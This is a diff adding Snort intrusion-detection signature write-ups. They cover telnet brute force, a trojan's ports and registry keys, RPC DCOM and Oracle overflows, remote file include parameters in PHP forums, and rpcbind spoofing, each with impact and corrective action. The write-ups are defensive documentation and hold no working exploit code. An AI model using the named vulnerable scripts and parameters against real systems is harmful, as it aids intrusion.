+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disable the vrfy command on your mail server, or update your Sendmail
+configuration file so that Sendmail displays non-sensitive information
+when it receives a vrfy root request.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+RFC 821:
+http://www.faqs.org/rfcs/rfc821.html
+
+Security Space:
+http://www.securityspace.com/smysecure/catid.html?viewsrc=1&id=10249
+
+--
--- /dev/null
+++ b/doc/signatures/718.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+718
+
+--
+Summary:
+This event is generated when an attempted telnet login fails from a remote user.
+
+--
+Impact:
+Attempted remote access.  This event may indicate that an attacker is attempting to guess username and password combinations.  Alternately, it may indicate that an authorized user has entered an incorrect username and password combination.
+
+--
+Detailed Information:
+A telnet server will issue an error message after a failed login attempt.  This may be an indication of an attacker attempting brute force guessing of username and password combinations.  It is also possible that an authorized user has incorrectly entered a legitimate username and password combination.  Telnet traffic is passed in clear text so it is not recommended for remote connections.  Secure Shell is considered to be a more secure alternative.
+
+--
+Affected Systems:
+Telnet servers.
+
+--
+Attack Scenarios:
+An attacker may attempt to guess username and password combinations.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+This event may be triggered by a failed telnet login attempt from a remote user.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Consider using Secure Shell instead of telnet.
+
+Block inbound telnet access if it is not required.
+
+--
+Contributors:
+Original rule writer Max Vision <vision@whitehats.com>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS127
+
+--
--- /dev/null
+++ b/doc/signatures/1368.txt
@@ -0,0 +1,48 @@
+Rule:
+
+--
+Sid:
+1368
+
+--
+Summary:
+Attempted ps command access via web
+
+--
+Impact:
+Attempt to gain information on system files and filestructure
+
+--
+Detailed Information:
+This is an attempt to gain intelligence on the filesystem on a webserver. The ls command lists the files and filesystem layout on a UNIX or Linux based system. The attacker could possibly gain information needed for other attacks on the host.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains '/bin/ls'in the URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. This command may also be requested on a command line should the attacker gain access to the machine. 
+
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+sid: 1369
+
+--
--- /dev/null
+++ b/doc/signatures/1098.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1098
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/141.txt
@@ -0,0 +1,94 @@
+Rule:
+
+--
+Sid:
+141
+
+--
+Summary:
+hack-a-tack is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data via download, upload of files, execution of files and reboot the targeted machine.
+
+--
+Detailed Information:
+The Trojan changes system registry settings to add the hack-a-tack server to programs normally started on boot. Due to the nature of this Trojan it is unlikely that the attacker's client IP address has been spoofed.
+
+	SID	Message
+	---	-------
+	141	HackAttack 1.20 Connect
+	614	hack-a-tack attempt
+
+This Trojan is commonly used to install other Trojan programs.
+
+The server portion opens TCP ports 31785 and 31787 and UDP ports 31789 and 31791 by default to establish a connection between client and server. The ports may then be configured by the attacker to use something other than these defaults.
+
+--
+Affected Systems:
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	Windows XP
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This event is indicative of an existing infection being activated. Initial compromise can be in the form of a Win32 installation program that may use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. Updated virus definition files are essential in detecting this Trojan.
+
+The Trojan server is located at <drive>:\WINDOWS\Expl32.exe.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+Registry keys added are:
+
+	Explorer32 ="<drive>:\windows\Expl32.exe"
+	Configuration Wizard = "<drive>:\windows=cfgwiz32.exe"
+
+Removal of this entry is required.
+
+Delete the file(s) <drive>:\WINDOWS\Expl32.exe and <drive>:\windows=cfgwiz32.exe
+
+Ending the Trojan process is also necessary. A reboot of the infected machine is recommended.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS314
+http://www.whitehats.com/info/IDS504
+
+Hackfix.org
+http://www.hackfix.org/miscfix/hackatack.shtml
+
+Commodon Communications
+http://www.commodon.com/threat/threat-hack.htm
+
+--
--- /dev/null
+++ b/doc/signatures/1776.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid: 1776
+
+-- 
+
+Summary: 
+This event is generated when an attempt is made to use the MySQL 'show' command to garner a list of databases.
+
+-- 
+Impact: 
+Intelligence gathering. This may be the prelude to an attack against one the databases or the MySQL daemon.
+
+--
+Detailed Information:
+This event is generated when the MySQL command 'show' is used to garner a list of MySQL databases being served by the MySQL daemon.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+--
+
+Attack Scenarios: 
+A MySQL implementation may inappropriately respond to connections from any host external to the protected network. The atttacker may be able to query the daemon to gain a list of databases available, then continue to garner information from the databases.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a legitimate user making a query to a MySQL daemon from an external source.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3416.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3416
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000687.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+100000687
+
+--
+Summary:
+This event is generated when an empty CTCP NOTICE message is sent to an IRC 
+channel.
+
+--
+Impact:
+If the EnergyMech IRC Bot receives such a message, a denial of service 
+condition will occur.
+
+--
+Detailed Information:
+Whenever the EnergyMech IRC Bot processes a null CTCP NOTICE message, a denial 
+of service condition occurs. Note that this rule is set to examine only default 
+IRC ports, in order to conserve system resources; if you are particularly 
+concerned about this exploit, you may wish to set the ports to "any", as IRC 
+channels can exist on any port.
+
+--
+Affected Systems:
+EnergyMech <= 3.0.1
+
+--
+Attack Scenarios:
+An attacker could exploit this vulnerability via any IRC client, or by using an 
+automated script.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to version 3.0.2 or greater.
+
+--
+Contributors:
+VeriSign MSS Operations Team
+Joel Esler <joel.esler@sourcefire.com>
+
+--
+Additional References:
+http://www.energymech.net/versions-3.0.html
+
+--
--- /dev/null
+++ b/doc/signatures/2345.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+2345
+
+--
+Summary:
+This event is generated when an attempt is made to access the
+search.php script which contains known vulnerabilities and
+is part of  the phpGedView CGI web application running on a server.
+
+--
+Impact:
+Information gathering and possible cross site scripting attack.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the phpGedView CGI web application running on a server.
+Multiple vulnerabilities exist in the application which can lead to
+cross site scripting attacks.
+
+--
+Affected Systems:
+	phpGedView
+
+--
+Attack Scenarios:
+An attacker can supply code of their choice by including it in the
+firstname parameter of the search.php script.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2227.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+2227
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP application Pod.Board.
+
+--
+Impact:
+Execution of arbitrary code on the client machine connecting to the host
+running the application. Theft of cookie data not limited to 
+authentication credentials is possible.
+
+--
+Detailed Information:
+The forum_details.php script does not properly check data supplied in 
+input fields or via URI parameters which leads to HTML injection 
+possibilites. This injection can include malicious script of the 
+attackers choosing.
+
+--
+Affected Systems:
+	planetinsanity.de pod.board 1.1
+
+--
+Attack Scenarios:
+A cross site scripting attack is possible, the attacker would need to 
+entice the victim to use a link supplied by the attacker which could 
+then divulge login and cookie information.
+
+--
+Ease of Attack:
+Moderate to Difficult. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1762.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1762
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2388.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+2388
+
+--
+Summary:
+This event is generated when an attempt is made to access
+view_broadcast.cgi on a server used for streaming media services.
+
+--
+Impact:
+Information gathering and system integrity compromise.
+
+--
+Detailed Information:
+The view_broadcast.cgi script contains a known vulnerability that may
+allow an attacker to perform a variety of cross-site scripting attacks.
+This event is generated when an attempt is amde to access the script
+directly from a source external to the protected network.
+
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000502.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+100000502
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Ji-Takz" application running on a webserver. 
+Access to the file "tag.class.php" using a remote file being passed as the 
+"mycfg" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "mycfg" parameter in the "tag.class.php" script used by 
+the "Ji-Takz" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ji-Takz
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000493.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000493
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "DeluxeBB" application running on a webserver. 
+Access to the file "postreply.php" using a remote file being passed as the 
+"templatefolder" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "templatefolder" parameter in the "postreply.php" script 
+used by the "DeluxeBB" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using DeluxeBB
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1674.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1674
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1486.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1486
+ 
+--
+Summary:
+This event is generated when an attempt is made to access the file ctss.idc.
+
+--
+Impact:
+Remote access.  This attack may permit the execution of arbitrary
+commands on the vulnerable server.
+
+--
+Detailed Information:
+This mkilog.exe is a Common Gateway Interface (CGI) script that can be
+used to view and modify SQL database contents.  It posts data to another
+module, ctss,idc, that creates a table based on the parameters passed to
+it.  If an attacker passes parameters such as a valid username and
+password to create a table, it may be possible to alter the table to
+execute commands on the vulnerable server.
+
+--
+Affected Systems:
+	Windows systems.
+
+--
+Attack Scenarios:
+An attacker can attempt to exploit this vulnerability to execute remote
+commands on the vulnerable server. 
+
+--
+Ease of Attack:
+Easy.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Delete file /scripts/tools/ctss.idc
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+SecurityFocus Mail Archive:
+http://www.securityfocus.com/archive/101/200779
+
+--
--- /dev/null
+++ b/doc/signatures/3231.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3231
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1155.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1155
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1873.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1873
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/446.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid:
+446
+
+--
+Summary:
+This event is generated when an ICMP "SKIP" message is generated with a non-zero ICMP code.
+
+--
+Impact:
+Informational. This may indicate that the ICMP message has been crafted. 
+
+--
+Detailed Information:
+An ICMP "SKIP" message is issued when a SKIP request to provide keying material fails. The ICMP code value for this message should be 0.  If a non-zero code for the ICMP code is observed, it may be an indication that the packet was crafted with an invalid value.
+ 
+
+--
+Affected Systems:
+This traffic should have no adverse impact.
+
+--
+Attack Scenarios:
+An attacker may craft an ICMP "SKIP" message with an invalid ICMP code.  A single packet itself is not harmful, but the unusual ICMP code may indicate that this packet was abnormally generated.
+
+--
+Ease of Attack:
+Simple. There are many packages available to generate ICMP messages.
+
+--
+False Positives:
+Although it should be rare, it is possible to observe an ICMP "SKIP" message with an ICMP code greater than 0 if it is generated by software that does not conform to standards.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+None.
+
+--
+Contributors:
+Original rule writer unknown.
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2736.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2736
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_priority_date
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2014.txt
@@ -0,0 +1,76 @@
+Rule:
+
+--
+Sid:
+2014
+
+--
+Summary:
+Remote Procedure Call (RPC) is a facility that enables a machine to 
+request a service from another remote machine. This is done without the 
+need for detailed network information. Some versions of RPC have a 
+vulnerability that allows an a remote host to register (and un-register)
+applications from a spoofed source.
+
+--
+Impact:
+Possible denial of service (DoS) against the target host. Potential 
+remote root compromise of the target system.
+
+--
+Detailed Information:
+Certain versions of rpcbind portmapper contain a flaw that could allow 
+an attacker capable of spoofing TCP packets to set and unset calls to 
+arbitrary RPC programs.
+
+A denial of service could be instigated against the target machine that 
+could render network file system services and other such network 
+available services unavailable to network users.
+
+It is also possible for the attacker to gain super user access depending
+on the RPC service he is able to register. This could then lead to a
+compromise of all resources on the network the victim is attached to.
+
+--
+Affected Systems:
+All machines running vulnerable RPC services.
+
+--
+Attack Scenarios:
+The attacker could potentially spoof TCP packets for pmap_set to 
+register an RPC service. The attacker might also spoof TCP packets to 
+un-register needed services via pmap_unset.
+
+--
+Ease of Attack:
+Simple
+
